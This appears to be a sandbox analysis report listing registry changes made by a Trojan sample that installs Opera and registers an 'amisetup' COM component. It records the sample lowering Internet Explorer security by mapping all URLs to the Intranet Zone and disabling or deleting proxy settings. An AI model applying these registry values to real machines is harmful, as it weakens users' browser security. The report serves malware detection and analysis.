[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process opera.exe:2828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 B7 4A BA 08 47 D2 EB A3 5B 5B 89 C8 9A 51 0C"

The process opera.exe:3828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 78 70 90 4E 2A B2 5A F1 18 A2 E6 B9 3C 69 2D"

The process opera.exe:2796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 7D 7F 78 39 D5 CD 3F 5D 1A E9 10 D1 30 AC 7E"

The process installer.exe:3724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 36 C2 33 E6 B8 F3 3B 63 59 5D F5 35 02 8F 4D"

The process installer.exe:1364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Opera Software]
"Previous Default Browser" = "%Program Files%\Internet Explorer\iexplore.exe -nohome"

[HKCU\Software\Classes\.xht]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\DefaultIcon]
"(Default)" = "%Program Files%\Opera\Launcher.exe,0"

[HKCU\Software\Classes\OperaStable\DefaultIcon]
"(Default)" = "%Program Files%\Opera\Launcher.exe,0"

[HKCR\.shtml]
"(Default)" = "OperaStable"

[HKCU\Software\Classes\.shtml]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\shell\open\command]
"(Default)" = "%Program Files%\Opera\Launcher.exe"

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\Opera\Launcher.exe,0"

[HKCU\Software\Classes\OperaStable\shell\open\command]
"(Default)" = "%Program Files%\Opera\Launcher.exe -noautoupdate -- %1"

[HKCU\Software\Classes\.crx]
"(Default)" = "OperaStable"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 34.0.2036.41]
"URLInfoAbout" = "http://www.opera.com/"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\InstallInfo]
"ShowIconsCommand" = "%Program Files%\Opera\Launcher.exe --showicons"

[HKCR\.oex]
"(Default)" = "OperaStable.Extension"

[HKCU\Software\Classes\http]
"EditFlags" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\.opdownload]
"(Default)" = "OperaStable"

[HKCR\.crx]
"(Default)" = "OperaStable"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\Opera\launcher.exe -noautoupdate -- %1"

[HKCR\.xhtml]
"(Default)" = "OperaStable"

[HKCU\Software\Classes\.html]
"(Default)" = "OperaStable"

[HKCR\.nex]
"(Default)" = "OperaStable"

[HKCR\OperaStable\DefaultIcon]
"(Default)" = "%Program Files%\Opera\Launcher.exe,0"

[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\Opera\launcher.exe -noautoupdate -- %1"

[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Opera\Launcher.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCR\OperaStable\shell\open\command]
"(Default)" = "%Program Files%\Opera\Launcher.exe -noautoupdate -- %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 34.0.2036.41]
"DisplayName" = "Opera Stable 34.0.2036.41"

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\Opera\Launcher.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\InstallInfo]
"ReinstallCommand" = "%Program Files%\Opera\Launcher.exe --makedefaultbrowser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCR\HTTP]
"EditFlags" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 34.0.2036.41]
"DisplayIcon" = "%Program Files%\Opera\Launcher.exe,0"

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\Opera\launcher.exe -noautoupdate -- %1"

[HKCR\OperaStable]
"FriendlyTypeName" = "Opera Web Document"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable]
"(Default)" = "Opera Stable"

[HKCU\Software\Classes\ftp]
"EditFlags" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Classes\.nex]
"(Default)" = "OperaStable"

[HKCU\Software\Opera Software]
"Last Stable Install Path" = "%Program Files%\Opera\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe]
"(Default)" = "%Program Files%\Opera\Launcher.exe"

[HKCU\Software\Classes\.opdownload]
"(Default)" = "OperaStable"

[HKCU\Software\Classes\.htm]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 34.0.2036.41]
"NoModify" = "1"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\Opera\launcher.exe -noautoupdate -- %1"

[HKCR\https]
"EditFlags" = "2"

[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\Opera\Launcher.exe,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Classes\https]
"EditFlags" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 34.0.2036.41]
"UninstallString" = "%Program Files%\Opera\Launcher.exe /uninstall"
"URLUpdateInfo" = "http://www.opera.com/download/"
"NoRepair" = "1"
"HelpLink" = "http://help.opera.com/?p="

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 AE AA D6 BB 23 A5 97 01 A2 8E 18 CD 2E 1B DA"

[HKCR\.xht]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\Opera\launcher.exe -noautoupdate -- %1"

[HKCR\ftp]
"EditFlags" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe]
"Path" = "%Program Files%\Opera"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\InstallInfo]
"IconsVisible" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 34.0.2036.41]
"Publisher" = "Opera Software"

[HKCR\Applications\Opera.exe\shell\open\command]
"(Default)" = "%Program Files%\Opera\Launcher.exe %1"

[HKCU\Software\Classes\.xhtml]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\InstallInfo]
"HideIconsCommand" = "%Program Files%\Opera\Launcher.exe --hideicons"

[HKCR\.htm]
"(Default)" = "OperaStable"

[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "OperaStable"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\Opera\launcher.exe -noautoupdate -- %1"

[HKCR\.html]
"(Default)" = "OperaStable"

[HKCU\Software\Classes\OperaStable]
"FriendlyTypeName" = "Opera Web Document"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 34.0.2036.41]
"InstallLocation" = "%Program Files%\Opera"
"DisplayVersion" = "34.0.2036.41"

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Opera\Launcher.exe,0"

[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\Opera\Launcher.exe,0"

The process amisetup9338__14991.exe:912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}]
"(Default)" = "IBoot"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\VersionIndependentProgID]
"(Default)" = "missteer.films"

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup9338__14991.exe"

[HKCR\missteer.films.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\TypeLib]
"(Default)" = "{afff9aac-aea5-4880-9032-a9587409a2af}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\ProgID]
"(Default)" = "missteer.films.1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup9338__14991.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\TypeLib]
"(Default)" = "{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}"

[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0]
"(Default)" = "InstallerLib"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup9338__14991\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup9338__14991.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCR\missteer.films\CurVer]
"(Default)" = "missteer.films.1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F 4F B1 0C 75 27 2F E3 DB 42 CB 61 3A B8 CE 0D"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1450549891"

[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\missteer.films]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup9338__14991.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCR\missteer.films.1\CLSID]
"(Default)" = "{c5177071-f77e-4b26-9bc2-b5b7c162af7a}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\TypeLib]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}]
[HKCR\missteer.films.1\CLSID]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\Programmable]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\LocalServer32]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\Version]
[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\ProxyStubClsid]
[HKCR\missteer.films.1]
[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\0]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\0\win32]
[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\ProxyStubClsid32]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\ProgID]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\VersionIndependentProgID]
[HKCR\missteer.films\CurVer]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\HELPDIR]
[HKCR\missteer.films]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\FLAGS]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\TypeLib]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup9338__14991\DEBUG]
"Trace Level"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\LocalServer32]
"ServerExecutable"

The process amisetup9364__14991.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}]
"(Default)" = "IBoot"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\VersionIndependentProgID]
"(Default)" = "missteer.films"

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup9364__14991.exe"

[HKCR\missteer.films.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\TypeLib]
"(Default)" = "{afff9aac-aea5-4880-9032-a9587409a2af}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\ProgID]
"(Default)" = "missteer.films.1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup9364__14991.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup9364__14991\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\TypeLib]
"(Default)" = "{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}"

[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0]
"(Default)" = "InstallerLib"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup9364__14991.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCR\missteer.films\CurVer]
"(Default)" = "missteer.films.1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C EA 89 B0 E4 C1 96 7F F1 6F E7 18 03 14 71 85"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1450549891"

[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\TypeLib]
"Version" = "1.0"

